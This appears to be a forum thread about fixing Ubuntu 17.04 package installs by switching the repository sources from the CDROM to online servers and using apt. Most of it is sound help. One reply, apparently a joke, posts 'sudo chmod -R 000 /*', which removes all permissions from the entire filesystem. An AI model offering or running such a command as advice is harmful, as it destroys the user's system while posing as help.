pretty sure you should go to software & updates, correct your sources so it gets updates from the internet rather than the CDROM and then open the .deb file you downloaded

cdrom with ubuntu 17.04 "Zesty Zapus"

is unticked

on the first page "ubuntu software" tab;

click everything except "source code";

select download from server for united states;

"other software" should have CDROM unselected. It might have other stuff, it might have google's repo in there. Mine is full of steam and SDK repos.

tick everything in updates tab.

Everything else should be ok and you should be able to go to terminal and do

sudo apt update

sudo apt install ....

But i still cant install other programs.Do you thing a new ubuntu install would help?

you can't install any package, or just some? Ubuntu requires some additional repositories for some packages, if you need something in particular do a research to find out which repository you need to add (and how to add it).

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

This sort of error description is what drives me to drink at work...

I deal in shitposts and shitpost accessories.
